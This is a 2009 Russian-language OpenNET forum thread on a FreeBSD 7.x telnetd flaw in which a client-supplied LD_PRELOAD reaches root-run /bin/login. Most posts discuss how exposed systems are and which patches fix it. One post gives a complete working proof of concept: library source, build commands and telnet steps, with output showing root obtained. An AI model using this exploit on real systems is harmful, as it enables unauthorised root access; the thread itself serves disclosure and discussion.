The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка  RSS
"Получение root привилегий через telnetd демон во FreeBSD"
Вариант для распечатки  
Пред. тема | След. тема 
Форумы Разговоры, обсуждение новостей (Public)
Изначальное сообщение [ Отслеживать ]

"Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от opennews (??) on 16-Фев-09, 10:33 
В telnetd демоне, входящем в состав FreeBSD 7.x, обнаружена (http://lists.grok.org.uk/pipermail/full-disclosure/2009-Febr...) критическая уязвимость, позволяющая локальному злоумышленнику получить привилегии суперпользователя в системе. Предположительно проблеме подвержены OpenBSD, NetBSD и другие системы.

Эксплоит настолько прост, что вначале даже не верится, что он может работать. Уязвимость связана ненадлежащей чисткой переменных окружения перед вызовом /bin/login из telnetd (отсутствует чистка переменной окружения LD_PRELOAD, которую можно передать со стороны клиента, так как telnet протокол поддерживает передачу переменных окружения). Суть метода в подключении, через LD_PRELOAD простейшей библиотеки, запускающей /bin/sh в процедуре инициализации.  Библиотека должна находиться на атакуемом хосте. При этом в момент подключения к локальному telnetd серверу, злоумышленник без аутентификации получает root shell.


Теоретически на основе данной проблемы можно реализ...

URL: http://lists.grok.org.uk/pipermail/full-disclosure/2009-Febr...
Новость: http://www.opennet.me/opennews/art.shtml?num=20302

Высказать мнение | Ответить | Правка | Cообщить модератору

 Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от Аноним (??) on 16-Фев-09, 10:33 
Много людей юзают telnet на продакшен?
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

3. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от goshanecr email(??) on 16-Фев-09, 10:39 
>Много людей юзают telnet на продакшен?

Да даже и на непродакшен, зачем его пользовать? Включение хоть телнета, хоть ssh это в самом простом случае +1 строчка в конфиг, а клиент есть либо по умолчанию, либо уж ладно putty с собой таскать не сложно. Хотя встроенные всякие железяки пользуют его..

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

18. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от sumkamama on 16-Фев-09, 20:30 
>Много людей юзают telnet на продакшен?

Вы знаете, какую нагрузку даёт ssh на 2000 сессий?

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

24. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от PereresusNeVlezaetBuggy email(ok) on 16-Фев-09, 23:56 
>>Много людей юзают telnet на продакшен?
>
>Вы знаете, какую нагрузку даёт ssh на 2000 сессий?

А кто будет давать такую нагрузку? Юзеры? Так им-то как раз SSH и прописан, ибо сетевой безопасности не разумеют. Telnet сейчас реально юзается в embedded из-за простоты реализации и соображений совместимости. Других обоснованных применений за последнее время я не встречал. А вы?

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

29. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от Умник on 17-Фев-09, 09:30 
>>Много людей юзают telnet на продакшен?
>
>Вы знаете, какую нагрузку даёт ssh на 2000 сессий?

2000 админов на сервак мертвеца ))))

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

36. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от User294 (ok) on 17-Фев-09, 09:53 
>2000 админов на сервак мертвеца ))))

Если порезать крутой и мощный сервак на VDSки - может оказаться не такой уж и фантастикой.

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

41. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от Frank email(??) on 17-Фев-09, 16:00 
боюсь, сервак с 2000 vps загнётся ещё до логинов по ssh, от одного только количества запущенных процессов :)
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

2. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от metallic on 16-Фев-09, 10:35 
Простите, я поколение пепси, а что такое телнет? Это что-то типа ssh, да?
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

4. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от InkviZitor on 16-Фев-09, 10:40 
Угу, только данный передаются в незашифрованном виде
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

23. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от Аноним (??) on 16-Фев-09, 21:42 
>Угу, только данный передаются в незашифрованном виде

telnet довольно давно умеет шифрование делать.

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

40. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от metallic on 17-Фев-09, 13:32 
>telnet довольно давно умеет шифрование делать.

А оно надо?

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

39. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от metallic on 17-Фев-09, 13:32 
Расслабьтесь, я пошутил :)
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

10. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от gvf (??) on 16-Фев-09, 11:45 
Кдассная шутка, спасибо :)
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

12. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от ABC (??) on 16-Фев-09, 13:33 
>Простите, я поколение пепси, а что такое телнет? Это что-то типа ssh,
>да?

И правда смешно :)

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

5. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от Аноним (??) on 16-Фев-09, 10:43 
Не думаю. В то же время мой модем поддерживает ftp. А telnet висит постоянно...
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

6. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от Ы on 16-Фев-09, 11:18 
Ужас! Как же терь жить то будем без телнета!!!
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

7. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от Ы on 16-Фев-09, 11:19 
Кстати, почему его еще не выкинут из базовой системы?
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

8. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от PereresusNeVlezaetBuggy email(ok) on 16-Фев-09, 11:39 
В OpenBSD давно выкинут, поэтому она явно не подвержена этой атаке :)))
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

9. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от BigAlex on 16-Фев-09, 11:40 
POSIX вестимо
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

11. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от PereresusNeVlezaetBuggy email(ok) on 16-Фев-09, 11:57 
>POSIX вестимо

Ни telnet, ни telnetd не входят в SUS

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

30. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от Умник on 17-Фев-09, 09:32 
>Кстати, почему его еще не выкинут из базовой системы?

При минимальной установке - отключен по умолчанию!

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

13. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от КтулхЪ on 16-Фев-09, 17:29 
>Эксплоит настолько прост, что вначале даже не верится, что он может работать.

Все гениальное просто =)

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

14. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от Умник on 16-Фев-09, 17:40 
telnetd is disabled by default
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

15. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от Аноним (??) on 16-Фев-09, 20:01 
Всё китайцы сейчас начнут сканить 23 порты нмапом... :)
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

16. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от Гость on 16-Фев-09, 20:15 
А никому не приходила в голову мысль, что LD_PRELOAD просто в принципе не работает для setuid программ если их не root запускает? А если root запускает то и подгружать ничего не надо. Головой-то подумать можно если лень ман почитать - каждый дурак из shell бы подгрузил что ему захочется. Но нет, кто-то попробовал от root и о - чудо! Сработало! Я хакер!
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

17. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от Гость on 16-Фев-09, 20:16 
В догонку: кстати в OpenBSD нет telnetd в принципе...
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

19. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от Гость on 16-Фев-09, 20:38 
Еще в догонку. Дыра все-таки возможна - надо просто руки оторвать тому кто описывал проблему. Речь идет о возможности передачи переменной через сессию, а в этом случае setuid собственно вообще не причем - права root изначально.
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

20. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от Аноним (??) on 16-Фев-09, 20:42 
>Еще в догонку. Дыра все-таки возможна - надо просто руки оторвать тому
>кто описывал проблему. Речь идет о возможности передачи переменной через сессию,
>а в этом случае setuid собственно вообще не причем - права
>root изначально.

А где ты упоминание setuid нашел ? В тексте новости и в оригинале как раз про передачи переменной в сессии написано, а про setuid ни слова.

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

21. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от Гость on 16-Фев-09, 20:52 
Про setuid перепутал - это на securitylab было написано, вот и перемешалось. Текст просто сильно похожий и из него не сразу понятно откуда вообще дыра взялась. В общеим случае дыра не в том, что не очищается перед запуском, а в том, что позволяет установить такую переменную через сессию.
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

22. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от Гость on 16-Фев-09, 21:06 
Еще в догонку... Кому интересно - посмотрел FreeBSD-current - действительно пропускает все. NetBSD-current - режет
OpenBSD (telnetd выкосили три года назад, на тот момент) - режет
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

31. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от Умник on 17-Фев-09, 09:36 
>Еще в догонку... Кому интересно - посмотрел FreeBSD-current - действительно пропускает все.
>NetBSD-current - режет
>OpenBSD (telnetd выкосили три года назад, на тот момент) - режет

Current не показатель!

Из офф. письма:

"Some basic information from our investigation so far, subject to change as we
investigate further:
* this affects telnetd in FreeBSD 7.0-RELEASE, 7.1-RELEASE, 7-STABLE, and 8-CURRENT.
* telnetd is disabled by default; if it is enabled, this is normally done via
inetd(8)."

Для слепых: telnetd is DISABLED by DEFAULT

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

35. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от PereresusNeVlezaetBuggy email(ok) on 17-Фев-09, 09:48 
>>Еще в догонку... Кому интересно - посмотрел FreeBSD-current - действительно пропускает все.
>>NetBSD-current - режет
>>OpenBSD (telnetd выкосили три года назад, на тот момент) - режет
>
>Current не показатель!

Интересно, а где же тогда ошибки будут исправляться? Security fixes backports — тема вообще отдельная.

>[оверквотинг удален]
>
>"Some basic information from our investigation so far, subject to change as
>we
>investigate further:
>* this affects telnetd in FreeBSD 7.0-RELEASE, 7.1-RELEASE, 7-STABLE, and 8-CURRENT.
>* telnetd is disabled by default; if it is enabled, this is
>normally done via
>inetd(8)."
>
>Для слепых: telnetd is DISABLED by DEFAULT

Для шибко умных: не считайте остальных тупее себя.

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

25. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от chuvy email(??) on 17-Фев-09, 07:21 
>>It is unlikely that this bug can be exploited remotely but is not impossible.

Чувак пробовал локально это делать. При том в 7.0. И сам же утверждает что маловероятно использовать ее удаленно. И делается это от рута, если кто не заметил.

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

26. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от chuvy email(??) on 17-Фев-09, 07:28 
what leads to a (possible) remote root hole - что приводит к (возможно) удаленному root управлению.
Имхо туфта все это.
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

27. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от Гость on 17-Фев-09, 07:52 
Не туфта.
Просто написана статья так, что не сразу ясно что имеется в виду.
А суть в том, что телнет во фре (до сегодняшнего дня) позволял передать в environment сессии все что угодно и соответственно подгрузить shared object, который вызовется login'ом еще на правах root. Статья говорит о том, что не чистится данная переменная, но на деле ее и не надо чистить - надо не допускать установки ее удаленно (и не только ее).
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

28. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от Гость on 17-Фев-09, 08:00 
Кстати посмотрел что сегодня пропатчили во фре - судя по всему ничего по теме :)
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

32. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от Умник on 17-Фев-09, 09:39 
>Не туфта.
>Просто написана статья так, что не сразу ясно что имеется в виду.
>
>А суть в том, что телнет во фре (до сегодняшнего дня) позволял
>передать в environment сессии все что угодно и соответственно подгрузить shared
>object, который вызовется login'ом еще на правах root. Статья говорит о
>том, что не чистится данная переменная, но на деле ее и
>не надо чистить - надо не допускать установки ее удаленно (и
>не только ее).

ТУФТА!

1. Telnetd отключен по умолчанию (см. офф. письмо о уязвимости!)
2. Разумный человек отставляет только необходимые демоны в системе, в особенности на сервере
3. Разумный чаловек использует файервол как на рабочей станции так и в особенности на сервере

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

34. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от PereresusNeVlezaetBuggy email(ok) on 17-Фев-09, 09:46 
>[оверквотинг удален]
>>не надо чистить - надо не допускать установки ее удаленно (и
>>не только ее).
>
>ТУФТА!
>
>1. Telnetd отключен по умолчанию (см. офф. письмо о уязвимости!)
>2. Разумный человек отставляет только необходимые демоны в системе, в особенности на
>сервере
>3. Разумный чаловек использует файервол как на рабочей станции так и в
>особенности на сервере

Для самых умных — речи не было о том, что эта уязвимость проявляется в установке по умолчанию. И если сервис поднят, то и доступ к нему будет открыт, ибо для того он и поднят, чтобы им пользовались.

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

45. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от aurved on 18-Фев-09, 14:16 
recent changes in FreeBSD's environment-handling
code rendered telnetd's scrubbing inoperative, thereby allowing potentially
harmful environment variables to be set.

RECENT CHANGES -- насколько я понял это только в 7.0 и 7.1 проявилось, поэтому и исправлений даже для 6-ой ветки нету. А в старых ветках в environment-handling
code не было этого.

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

33. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от Умник on 17-Фев-09, 09:43 
Неужели в природе есть люди не сканящие свой сервер или рабочую станцию nmap и оставляющие ненужные демоны?!

P.S. Виндузятники - не люди, а зомби!

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

42. "Получение root привилегий через telnetd демон во FreeBSD"  
Сообщение от Аноним (??) on 17-Фев-09, 21:47 
> Неужели в природе есть люди не сканящие свой сервер или рабочую станцию nmap и оставляющие ненужные демоны?!

для проверки на ненужные сервисы совсем не обязательно ставить nmap. Хватит и штатного sockstat(1). Напр.

    sockstat -l46

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

37. "Получение root привилегий через telnetd демон во FreeBSD (оп..."  
Сообщение от Гость on 17-Фев-09, 10:07 
Вопрос не в скане - телнет никто в здравом уме не включит, а по умолчанию он выключен. Вопрос в том, что в принципе дыра в программе есть...
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

38. "Получение root привилегий через telnetd демон во FreeBSD (оп..."  
Сообщение от Гость on 17-Фев-09, 10:08 
Кому интересно...

%id
uid=1001(test) gid=1001(test) groups=1001(test)
%cd /tmp
%cat >test.c
#include <sys/types.h>
#include <login_cap.h>
#include <stdio.h>
  
int
setusercontext(login_cap_t *lc, const struct passwd *pwd, uid_t uid,
        unsigned int flags)
{
        printf("Xa-xa!\n");
        return (0);
}
%cc -c -o test.so -fPIC test.c
%cc -shared -o libtest.so.0.0 test.so
%telnet
telnet> aut dis sra
telnet> env def LD_PRELOAD /tmp/libtest.so.0.0
telnet> ope localhost
Trying 127.0.0.1...  
Connected to localhost.
Escape character is '^]'.

FreeBSD/i386 (shit.home.lan) (ttyp3)

Password:
Xa-xa!  
Last login: Tue Feb 17 12:51:07 from form.win.alveis.
Xa-xa!
Copyright (c) 1992-2009 The FreeBSD Project.
Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994
        The Regents of the University of California. All rights reserved.

FreeBSD 7.1-RELEASE (GENERIC) #0: Thu Jan  1 14:37:25 UTC 2009

Welcome to FreeBSD!


%id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
%halt
Connection closed by foreign host.


Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

43. "Получение root привилегий через telnetd демон во FreeBSD (оп..."  
Сообщение от Осторожный (ok) on 18-Фев-09, 09:03 
В заголовке новости ошибка - исправьте !!!

===>
Дополнение 1: Опубликован официальный отчет от службы реагирования на проблемы безопасности FreeBSD. Уязвимости подвержены только FreeBSD 7.0-RELEASE, 7.1-RELEASE, 7-STABLE и 8-CURRENT. Исправление уже присутствует в выпусках 7.1-RELEASE-p10, 7.0-RELEASE-p3, 7.1-STABLE и доступно в виде патча.
===>

На самом деле должно быть 7.1-RELEASE-p3, 7.0-RELEASE-p10
Видимо переписывали из анонса FreeBSD - там такая же ошибка :)

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

44. "Получение root привилегий через telnetd демон во FreeBSD (оп..."  
Сообщение от PereresusNeVlezaetBuggy email(ok) on 18-Фев-09, 09:10 
>[оверквотинг удален]
>
>===>
>Дополнение 1: Опубликован официальный отчет от службы реагирования на проблемы безопасности FreeBSD.
>Уязвимости подвержены только FreeBSD 7.0-RELEASE, 7.1-RELEASE, 7-STABLE и 8-CURRENT. Исправление уже
>присутствует в выпусках 7.1-RELEASE-p10, 7.0-RELEASE-p3, 7.1-STABLE и доступно в виде патча.
>
>===>
>
>На самом деле должно быть 7.1-RELEASE-p3, 7.0-RELEASE-p10
>Видимо переписывали из анонса FreeBSD - там такая же ошибка :)

Тогда заодно стоит заменить

"Предположительно проблеме подвержены OpenBSD, NetBSD и другие системы."

на

"NetBSD и OpenBSD проблеме не подвержены, в DragonFly BSD проблема исправлена 14.02.2008; однако другие *BSD-системы могут всё ещё содержать уязвимость."

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру